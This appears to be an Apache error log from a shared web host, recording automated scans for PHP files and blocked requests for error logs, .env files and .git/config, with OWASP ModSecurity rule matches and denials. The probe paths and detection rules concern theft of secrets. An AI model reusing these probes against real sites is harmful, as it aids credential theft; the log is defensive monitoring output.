[Mon May 11 15:19:30.387197 2026] [:error] [pid 1320398:tid 1320403] [client 52.169.148.186:2116] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.419617 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/qw_03b4ad31.php
[Mon May 11 15:19:30.422010 2026] [:error] [pid 1320398:tid 1320403] [client 52.169.148.186:2116] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.462506 2026] [:error] [pid 1320398:tid 1320403] [client 52.169.148.186:2116] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.498083 2026] [:error] [pid 1320398:tid 1320403] [client 52.169.148.186:2116] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.532934 2026] [:error] [pid 1320398:tid 1320403] [client 52.169.148.186:2116] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.567808 2026] [:error] [pid 1320398:tid 1320403] [client 52.169.148.186:2116] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.577351 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/radio.php
[Mon May 11 15:19:30.602719 2026] [:error] [pid 1320398:tid 1320403] [client 52.169.148.186:2116] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.637500 2026] [:error] [pid 1320398:tid 1320403] [client 52.169.148.186:2116] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.672235 2026] [:error] [pid 1320398:tid 1320403] [client 52.169.148.186:2116] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.711943 2026] [:error] [pid 1320398:tid 1320403] [client 52.169.148.186:2116] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.735838 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/sf.php
[Mon May 11 15:19:30.746660 2026] [:error] [pid 1320398:tid 1320403] [client 52.169.148.186:2116] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.799499 2026] [security2:error] [pid 1320674:tid 1320709] [client 45.133.170.203:48807] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHXYqO9RdIr1DwxYR2R5wAAANQ"], referer: https://www.piregwan-genesis.com/
[Mon May 11 15:19:30.890085 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.893417 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/simple.php
[Mon May 11 15:19:30.928698 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:30.967332 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.001518 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.036648 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.053522 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/sql.php
[Mon May 11 15:19:31.070542 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.112062 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.150558 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.184660 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.210992 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/test.php
[Mon May 11 15:19:31.221699 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.255999 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.290430 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.324603 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.368586 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.369048 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/test1.php
[Mon May 11 15:19:31.403067 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.437210 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.471371 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.514051 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.526556 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/themes.php
[Mon May 11 15:19:31.554899 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.593713 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.633886 2026] [:error] [pid 1319886:tid 1319931] [client 52.169.148.186:14079] File does not exist: /home/totalcloud/public_html/index.php
[Mon May 11 15:19:31.842068 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/wp-admin.php
[Mon May 11 15:19:32.158051 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/wp-blog-header.php
[Mon May 11 15:19:32.315902 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/wp-config-sample.php
[Mon May 11 15:19:33.105554 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/wp.php
[Mon May 11 15:19:33.447714 2026] [:error] [pid 1319886:tid 1319921] [client 4.193.137.131:15909] File does not exist: /home/sierraim/public_html/xmlrpc.php
[Mon May 11 15:19:41.136569 2026] [authz_core:error] [pid 1319953:tid 1319968] [client 135.181.213.219:55266] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/twentytwentyone/template-parts/content/error_log
[Mon May 11 15:19:42.661761 2026] [authz_core:error] [pid 1320674:tid 1321055] [client 135.181.213.219:55276] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/twentytwentyone/template-parts/excerpt/error_log
[Mon May 11 15:19:44.049309 2026] [authz_core:error] [pid 1320398:tid 1320411] [client 135.181.213.219:55282] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/twentytwentyone/template-parts/footer/error_log
[Mon May 11 15:19:45.577308 2026] [authz_core:error] [pid 1319953:tid 1319975] [client 135.181.213.219:55286] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/twentytwentyone/template-parts/header/error_log
[Mon May 11 15:19:47.096717 2026] [authz_core:error] [pid 1320674:tid 1320705] [client 135.181.213.219:55294] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/twentytwentyone/template-parts/post/error_log
[Mon May 11 15:19:51.725249 2026] [authz_core:error] [pid 1319886:tid 1319936] [client 135.181.213.219:17336] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/twentytwentytwo/inc/error_log
[Mon May 11 15:20:04.685935 2026] [security2:error] [pid 1320674:tid 1320699] [client 176.65.139.168:57682] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agHXhKO9RdIr1DwxYR2R_gAAAMk"]
[Mon May 11 15:20:04.686184 2026] [security2:error] [pid 1320674:tid 1320699] [client 176.65.139.168:57682] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tchatbooster.com"] [uri "/.env.local"] [unique_id "agHXhKO9RdIr1DwxYR2R_gAAAMk"]
[Mon May 11 15:20:05.603142 2026] [security2:error] [pid 1320674:tid 1320699] [client 176.65.139.168:57682] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tchatbooster.com"] [uri "/index.php"] [unique_id "agHXhKO9RdIr1DwxYR2R_gAAAMk"]
[Mon May 11 15:20:05.751485 2026] [security2:error] [pid 1319885:tid 1319892] [client 176.65.139.168:39302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agHXhVchVQ3tCn0m9OpYWgAAAQQ"]
[Mon May 11 15:20:05.751712 2026] [security2:error] [pid 1319885:tid 1319892] [client 176.65.139.168:39302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.tchatbooster.com"] [uri "/.env.local"] [unique_id "agHXhVchVQ3tCn0m9OpYWgAAAQQ"]
[Mon May 11 15:20:06.325254 2026] [security2:error] [pid 1319885:tid 1319892] [client 176.65.139.168:39302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.tchatbooster.com"] [uri "/index.php"] [unique_id "agHXhVchVQ3tCn0m9OpYWgAAAQQ"]
[Mon May 11 15:20:33.887541 2026] [security2:error] [pid 1319998:tid 1320022] [client 34.65.211.236:52864] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHXoat2WtvoFr7xvGzTUQAAAJY"]
[Mon May 11 15:20:33.888127 2026] [security2:error] [pid 1319998:tid 1320022] [client 34.65.211.236:52864] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHXoat2WtvoFr7xvGzTUQAAAJY"]
[Mon May 11 15:20:33.888744 2026] [security2:error] [pid 1319998:tid 1320022] [client 34.65.211.236:52864] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "portail.tct-telecom.fr"] [uri "/.git/config"] [unique_id "agHXoat2WtvoFr7xvGzTUQAAAJY"]
[Mon May 11 15:21:20.598204 2026] [:error] [pid 1320398:tid 1320415] [client 46.151.178.13:35540] File does not exist: /home/totalcloud/public_html/index.php, referer: http://217.113.192.26:443/
[Mon May 11 15:21:38.733842 2026] [security2:error] [pid 1320674:tid 1320707] [client 176.65.139.168:57040] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "flb.labaujue.com"] [uri "/.env.local"] [unique_id "agHX4qO9RdIr1DwxYR2SOQAAANI"]
[Mon May 11 15:21:38.735327 2026] [security2:error] [pid 1320674:tid 1320707] [client 176.65.139.168:57040] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "flb.labaujue.com"] [uri "/.env.local"] [unique_id "agHX4qO9RdIr1DwxYR2SOQAAANI"]
[Mon May 11 15:21:38.742708 2026] [security2:error] [pid 1320674:tid 1320707] [client 176.65.139.168:57040] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "flb.labaujue.com"] [uri "/.env.local"] [unique_id "agHX4qO9RdIr1DwxYR2SOQAAANI"]
[Mon May 11 15:21:45.624709 2026] [authz_core:error] [pid 1319998:tid 1320010] [client 135.181.213.219:59630] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/vendor/windwalker/data/error_log
[Mon May 11 15:21:48.675381 2026] [authz_core:error] [pid 1320398:tid 1320404] [client 135.181.213.219:59660] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-content/themes/fiji2/vendor/windwalker/renderer/error_log
[Mon May 11 15:21:57.001129 2026] [security2:error] [pid 1319886:tid 1319924] [client 170.106.192.208:53080] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "habilis.space"] [uri "/"] [unique_id "agHX9Ky-5-wpj6Sx56aYKAAAABA"]
[Mon May 11 15:21:59.932577 2026] [security2:error] [pid 1319885:tid 1319890] [client 170.106.192.208:57544] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "habilis.space"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agHX91chVQ3tCn0m9OpYsQAAAQI"], referer: http://habilis.space
[Mon May 11 15:21:59.984422 2026] [security2:error] [pid 1319953:tid 1319964] [client 43.153.208.49:41746] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.moncampingcarenligne.com"] [uri "/"] [unique_id "agHX9-SQ-m-m0ukSShuBWwAAAUk"]
[Mon May 11 15:22:17.724436 2026] [ssl:error] [pid 1319998:tid 1320022] (EAI 2)Name or service not known: [client 51.68.111.207:31943] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:22:17.725843 2026] [ssl:error] [pid 1319998:tid 1320022] AH01941: stapling_renew_response: responder error
[Mon May 11 15:22:22.667283 2026] [security2:error] [pid 1319886:tid 1319921] [client 146.148.14.25:59304] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agHYDqy-5-wpj6Sx56aYUQAAAA4"]
[Mon May 11 15:22:22.668471 2026] [security2:error] [pid 1319886:tid 1319921] [client 146.148.14.25:59304] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agHYDqy-5-wpj6Sx56aYUQAAAA4"]
[Mon May 11 15:22:22.668809 2026] [security2:error] [pid 1319886:tid 1319921] [client 146.148.14.25:59304] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/.git/config"] [unique_id "agHYDqy-5-wpj6Sx56aYUQAAAA4"]
[Mon May 11 15:22:25.100512 2026] [authz_core:error] [pid 1320674:tid 1320693] [client 135.181.213.219:9904] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sodium_compat/src/Core32/ChaCha20/error_log
[Mon May 11 15:22:25.664986 2026] [authz_core:error] [pid 1319953:tid 1319978] [client 47.128.58.63:62228] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/interactivity-api/error_log
[Mon May 11 15:22:26.623707 2026] [authz_core:error] [pid 1319885:tid 1319938] [client 135.181.213.219:9918] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sodium_compat/src/Core32/Curve25519/error_log
[Mon May 11 15:22:28.146664 2026] [authz_core:error] [pid 1319998:tid 1320003] [client 135.181.213.219:9920] AH01630: client denied by server configuration: /home/rixoneph/public_html/wp-includes/sodium_compat/src/Core32/Poly1305/error_log
[Mon May 11 15:22:58.032354 2026] [ssl:error] [pid 1319998:tid 1320004] (EAI 2)Name or service not known: [client 81.185.168.182:61528] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 15:22:58.032521 2026] [ssl:error] [pid 1319998:tid 1320004] AH01941: stapling_renew_response: responder error
[Mon May 11 15:23:05.308468 2026] [authz_core:error] [pid 1319885:tid 1319903] [client 216.73.217.28:36322] AH01630: client denied by server configuration: /home/piregwan/public_html/flb/images/vignettes/error_log
[Mon May 11 15:23:06.830791 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:45788] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYOlchVQ3tCn0m9OpY5AAAAQM"]
[Mon May 11 15:23:06.830937 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:45788] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYOlchVQ3tCn0m9OpY5AAAAQM"]
[Mon May 11 15:23:06.830981 2026] [security2:error] [pid 1319885:tid 1319893] [client 195.178.110.133:45946] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "phonebook.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYOlchVQ3tCn0m9OpY5wAAAQU"]
[Mon May 11 15:23:06.831105 2026] [security2:error] [pid 1319885:tid 1319893] [client 195.178.110.133:45946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "phonebook.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYOlchVQ3tCn0m9OpY5wAAAQU"]
[Mon May 11 15:23:06.831210 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.133:45788] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/.env.local"] [unique_id "agHYOlchVQ3tCn0m9OpY5AAAAQM"]
[Mon May 11 15:23:06.831760 2026] [security2:error] [pid 1319885:tid 1319893] [client 195.178.110.133:45946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "phonebook.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agHYOlchVQ3tCn0m9OpY5wAAAQU"]
